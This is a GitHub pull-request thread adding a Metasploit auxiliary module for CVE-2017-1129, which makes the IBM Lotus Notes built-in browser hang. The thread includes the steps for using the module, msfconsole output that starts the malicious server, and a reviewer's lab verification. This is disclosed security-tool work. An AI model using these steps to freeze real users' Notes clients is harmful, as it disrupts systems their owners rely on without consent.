
IBM Lotus Notes DoS (CVE-2017-1129) #8989

Merged
merged 5 commits into from Oct 10, 2017

Conversation


@RootUp RootUp commented Sep 22, 2017

This module will exploit a vulnerability (CVE-2017-1129) found in some versions of IBM Lotus Notes client, making the application unresponsive and no longer usable.

Verification

  • Start msfconsole
  • use auxiliary/dos/http/ibm_lotus_notes
  • set SRVHOST <IP of MSF system to act as server>
  • set SRVPORT <port of MSF system to act as server>
  • run
  • in target system's Notes client browser, navigate to the URL given in the output of the previous command
  • Verify the Notes client browser becomes unresponsive, making it unusable
  • Document the thing and how it works (Example)

Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

@pbarry-r7
Contributor

Thanks for your submission, @RootUp! Couple of small things:

  • please run msftidy against your module and address style/formatting things it points out (that's exactly what's causing the Travis failures above, like this one)
    • e.g. tools/dev/msftidy.rb modules/auxiliary/dos/ibm_lotus_notes.rb
  • please add a markdown (.md) documentation file describing your module and showing a run of it, something like this one

Thanks!

@RootUp
Contributor Author

RootUp commented Sep 23, 2017

Vulnerable Application

This module exploits a vulnerability in the inbuilt web browser of IBM Lotus Notes: the code uses JavaScript-based URI encoding and creates an object instance of encodeURI; due to the infinite loop, this leads to a denial of service.

Working of Module

  1. Start msfconsole
  2. use auxiliary/dos/http/ibm_lotus_notes.rb
  3. Set SRVHOST
  4. Set SRVPORT
  5. run (Server started)
  6. Visit server URL in web-browser of IBM

msf > use auxiliary/dos/http/ibm_lotus_notes 
msf auxiliary(ibm_lotus_notes) > show options 

Module options (auxiliary/dos/http/ibm_lotus_notes):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) > 
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) > 

Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

Regards
Dhiraj

@RootUp
Contributor Author

RootUp commented Sep 28, 2017

@pbarry-r7
Could you please look into it? Is it good to go 👍

@pbarry-r7
Contributor

Hey @RootUp, thanks for the updates, I'll try to give this a check through in the next day or so here.

Also, my bad on the link I provided above, I should have provided a link that clearly shows the separate markdown (.md) file for documentation, like this one. If you have a chance and wouldn't mind creating a new documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md file and just paste in the markdown you provided in your comment 5 days ago in this PR, that'd be super (and if not, I can do it when I'm looking at this). Thx!

@RootUp
Contributor Author

RootUp commented Sep 28, 2017

Hi @pbarry-r7

I have created a new PR, 9017, and created markdown documentation for the same; hope it helps.

Thank you :)

@pbarry-r7
Contributor

Nice, thanks, @RootUp! I went ahead and cherry-picked that file into this PR, since they're related.

@pbarry-r7 pbarry-r7 self-assigned this Oct 6, 2017
@pbarry-r7
Contributor

Ugh, IBM apparently reviews each trial request for Notes client in order to satisfy US export laws. :/ Waiting on that, will verify once I get the vulnerable SW.

@pbarry-r7
Contributor

Verified with IBM Lotus Notes 8.5.2 on Windows 7 Ultimate:

$ ./msfconsole -q
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options

Module options (auxiliary/dos/http/ibm_lotus_notes):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  


msf auxiliary(ibm_lotus_notes) > set SRVHOST 10.0.2.4
SRVHOST => 10.0.2.4
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > set URIPATH mypath
URIPATH => mypath
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(ibm_lotus_notes) > 
[*] Using URL: http://10.0.2.4:9092/mypath
[*] Server started.
[*] Sending response

Then started IBM Notes in my Windows Ultimate VM, used Open->Web Browser to get the built-in browser, and pointed it at http://10.0.2.4:9092/mypath. And that did make my IBM Notes client app become unresponsive.

Nice job, @RootUp! Thanks for the contribution. I've a couple very minor tweaks and will land here.

@pbarry-r7 pbarry-r7 changed the title ibm_lotus_notes.rb - CVE-2017-1129 IBM Lotus Notes DoS (CVE-2017-1129) Oct 10, 2017
@pbarry-r7 pbarry-r7 merged commit fd8b72c into rapid7:master Oct 10, 2017
pbarry-r7 added a commit that referenced this pull request Oct 10, 2017
@pbarry-r7
Contributor

pbarry-r7 commented Oct 10, 2017

Release Notes

This module targets versions of the IBM Lotus Notes client application vulnerable to CVE-2017-1129 to create a denial of service.

@RootUp
Contributor Author

RootUp commented Oct 10, 2017

Thank you @pbarry-r7 :)

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Nov 1, 2017